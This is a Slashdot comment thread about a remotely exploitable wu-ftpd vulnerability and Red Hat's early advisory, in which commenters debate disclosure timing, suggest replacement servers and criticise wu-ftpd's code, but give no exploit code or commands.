I'm not a security expert by any means, but...here is my list of horrible things to run:

1. sendmail
2. bind 8
3. Wu-ftpd.

There are replacements for each. Djbdns will give you $500 (IIRC) if you find an exploitable bug in their code. Proftpd, lukemftp, and the bsdftpd are all *much* better replacements for Wu-Ftpd. Sendmail...i can't remember, but there are replacements.

Nevertheless, bind should be run in a chroot jail. Doing things like that makes a bind hole useless. Please uninstall Wu-ftpd and use a replacement. Finally, if you don't need to run it, DON'T!

Qmail is a good replacement for sendmail (1)

HappyOscar (65200) | more than 12 years ago | (#2628125)

For what it's worth.

Check it! [qmail.org]

most recent story??? (1)

-audiowhore- (153163) | more than 12 years ago | (#2628066)

wow....
this is hard to believe. /. running a story only 1 day after the vulnerability was announced?? :)
-- audiowhore

CERT? Bah... go screw yourself! (0)

Anonymous Coward | more than 12 years ago | (#2628068)

FUCK CERT and their private list. People deserve to know this stuff when it happens.

how would you exploit this, though? (3, Insightful)

tim_maroney (239442) | more than 12 years ago | (#2628075)

The attacker must ensure that a maliciously constructed malloc header containing the target address and its replacement value are in the right location in the uninitialized part of the heap. The attacker must also place shellcode in server process memory.

Color me stupid, but that doesn't sound too feasible for a remote hack. How would you muck with the malloc heap this way? DoS, maybe, but unless there's something I'm missing, not too great for root access. Let me know if there's something I'm missing.

Tim

Re:how would you exploit this, though? (1)

Atilla (64444) | more than 12 years ago | (#2628153)

hear hear.

This is not a fucking skript kiddie quick hack.

The exploit seems to require a great deal of preparation, in-depth knowledge of software, and some other form of access to the target host.

this doesn't even closely compare to IIS holes which could be exploited by your grandma. If you're a true BOFH, you shouldn't have any trouble with this hole, because you've already disabled wu-ftpd.

Stop using stupid C language (3, Insightful)

Far (6486) | more than 12 years ago | (#2628076)

Using the C language to implement anything else but the lowest-level layers of a system is plain incompetence, all the more when security is involved. The criterion is simple: if there is ANY use of dynamic allocation, you should use a safe language like OCAML, CommonLISP, Mercury, Perl, Python, etc. [Of course, C may be used when *implementing* the dynamic allocation].

ssh too? (1)

hitchhacker (122525) | more than 12 years ago | (#2628078)

while we are on exploits,

Many implementations of ssh version 1 are vulnerable to a buffer overflow as well. It's a vulnerability in the protocol not the implementation. Last I checked (Sunday), Debian's version of OpenSSH 1.2 from security.debian.org was still vulnerable. Though this is all speculation because no public exploit has been released. (there are exploits around though)

see bugtraq from weeks ago [securityfocus.net]

metric

Marketing move, or horrible mistake? (2)

LazyDawg (519783) | more than 12 years ago | (#2628090)

On the one hand, I can see Redhat getting into problems with people all over for un-leveling the playing field, breaking a gentleman's agreement with CERT, etc.

On the other, this could easily and very vocally show RedHat, true or not, to be a good OS if you want to avoid security vulnerabilities. FUD victims could be saying to themselves, "These other guys sit on their hands for over a week?? I'm going to go with redhat!"

Microsoft social engineers news stories like this all the time. Single examples that Lemmings treat as a global sample of productivity, security, programmers' skill, or whatever other wonderful thing the company wants to tout.

Slanted comment (0)

utdpenguin (413984) | more than 12 years ago | (#2628093)

"A remote exploitable vulnerability was found in wu_ftp, which is distributed in all major distros."


Interesting. On my computer proftpd is the ftp daemon of choice. Granted, this is slackware, which is arguably not a major distro, but Mandrake 8.1 uses it as well, and surely Mandrake is a major distro? They are the most popular, after all!

Not all major distros (1)

Emmet (70481) | more than 12 years ago | (#2628096)

Not Slackware.

On Slackware, there is no wu_ftp, there is no pam, there is no Vixie crond.

And there are very few security advisories.

Re:Not all major distros (0)

Anonymous Coward | more than 12 years ago | (#2628164)

Too bad pam is actually useful...

wuftpd is a security hole anyway (1)

HappyOscar (65200) | more than 12 years ago | (#2628099)

Why use wuftpd when it's so trivial to install proftpd (which is, incidentally, also easier to configure)? wuftpd is dangerous to run because it's so patched as to be in the same state BIND 8 is in. Honestly, just because it's the "default" doesn't make it acceptable to run a patchwork server. That's about as dangerous as running a Microsoft server just because it's "industry standard" (which isn't true anyway).

And just as an aside, I respect RedHat for preemptively notifying people, H4XX0R5 included. If Apache were to have a horrible root-access-blows-up-your-site kind of hole discovered, I'd want that kind of incentive to upgrade soon. It's better than saying "There's a hole, we're working on fixing it, just wait and hope that someone doesn't figure it out from our context clues".

'Early Disclosure' To Whom? (0)

Anonymous Coward | more than 12 years ago | (#2628117)


RedHat's 'Early Disclosure' isn't so early to any crackers who already knew about the hole.

The sooner these things are revealed, the sooner people can switch to more secure alternatives.

The only sad part is that RedHat is apologizing for spilling the beans.

more to the story (5, Informative)

Phexro (9814) | more than 12 years ago | (#2628120)

item: the version of wu-ftpd that rh released was a pre-release from cvs. they changed the version number. this bug was fixed in cvs months ago.

item: the securityfocus vuln-help people are supposed to help coordinate vendors & the software maintainers. they sent notification of the bug to the wrong address, so the wu-ftpd developers weren't even aware that there was a bug present until the day the rh advisory went out.

item: there was supposed to be a coordinated advisory put out on dec. 3rd. rh preempted that, causing this nasty confusion.

greg lundberg posted a big explanation of what went on to several mailing lists... it should be on the wuftpd-questions [landfield.com] archive, but i don't see it there yet.

also, see the news item [securityfocus.com] at securityfocus about this.

Breach of Trust (2)

aridhol (112307) | more than 12 years ago | (#2628124)

Did RedHat breach trust with CERT? There was an exploit, sent out to vendors, along with an agreement not to leak it until the 3rd.

If there was a formal agreement not to release the information ahead of schedule, should this not be seen as a mark against RedHat?

Unfortunately, there is only one punishment I can see for this. RedHat should be removed from the mailing list for a specific amount of time, but not permanently.

The biggest problem I see with that is that it would hurt the customers, which is what we don't want.

Does anybody else have an idea of a suitable remedy?

Re:Breach of Trust (2)

The Man (684) | more than 12 years ago | (#2628151)

Actually I think all the vendors who agreed to delay releasing patches for a known severe problem have breached their customers' trust and should be punished. I would like to know what's going to be done to them. Maybe their customers should just stop doing business with them; that usually makes the problem go away on its own.

Stupid is as stupid does.. (1, Troll)

grub (11606) | more than 12 years ago | (#2628126)

a) install a secure by default OS such as OpenBSD
b) LEAVE FTP disabled
c) LEAVE Telnet disabled
d) ENABLE SFTP if you need an FTPish connection.

Live happy and don't end up like LinuxToday.com LOL

Know what you're doing. (3, Interesting)

rice_burners_suck (243660) | more than 12 years ago | (#2628131)

I think it's better that Red Hat released the advisory ahead of time. The faster sysadmins, programmers, and other users know about remote root exploits, the faster the exploit can be closed.

Of course, there are some folks out there who won't patch their system. For those people, advisories like this don't help at all. But then, if you're running anything important, you should take the time to learn how to properly configure and maintain the system. Trying to hide known exploits from the public only serves to make things more difficult and dangerous for those of us who DO know what we're doing.

In other words, if you don't know what you're doing, you shouldn't be using a computer.

OH WELL.

Probably already in use by the kiddies... (2)

Black Art (3335) | more than 12 years ago | (#2628138)

Linux Today's web site was defaced just a bit ago. May be coincidence or it may be the same hole.

What annoyed me is that I read the warning on this and I could not make heads or tails what the actual cause of the hole was. And I am a programmer!

Security warning by obscurity?

Shame (3, Funny)

Syberghost (10557) | more than 12 years ago | (#2628146)

How dare those RedHat bastards fix a security problem early.

Hypocrisy Detected!!! (5, Insightful)

Pinball Wizard (161942) | more than 12 years ago | (#2628148)

Now wait a minute. Here on /., MS gets slammed because they want bugtraq and whoever to wait before they publicize a security hole until a fix can be reasonably made.


Now you guys are criticizing Red Hat for releasing information too quickly?!


Make up your minds. Either it is a Good Thing to release this sort of information to the public or not. IMO, if CERT is withholding information to the public that just gives a wily cracker that much extra lead time to perform exploits. Whereas if the info was just released in the first place, at least people could turn their FTP servers yet, or switch to something like pure-ftp, which has yet to be cracked.


I agree with Red Hat on this one. They did people a favor by releasing the information.

No surprises here (5, Insightful)

Broccolist (52333) | more than 12 years ago | (#2628155)

Wu-FTPd has had a long history of security holes. It's practically the BIND of FTP servers.

I looked through the source of Wu-FTPd some time ago, when I was interested in adding support for an encrypted form of FTP proposed in a recent RFC (the protocol never caught on). What I found scared me. Most of the server is one humungous 8000-line C source file which appears to do pretty much everything.

Having quite a bit of experience with the FTP protocol, I expected to immediately understand what was going on, but at first glance, this code baffled me. It's full of pointer arithmetic and chains of if-statements performing mysterious, undecipherable operations on fixed-length arrays. It's not divided into clear levels of abstraction and I had difficulty telling what most functions were supposed to do, let alone what they actually did.

Anyway, I immediately gave up any thought of adding any new features to this godawful mess. Considering all the weird cruft that goes on in that code, it's no surprise to me that people are constantly finding new security holes in it. There are other featureful FTP servers out there; it's hard to see why distributions continue to include a bug-ridden program like Wu-FTPd as default in their distributions.
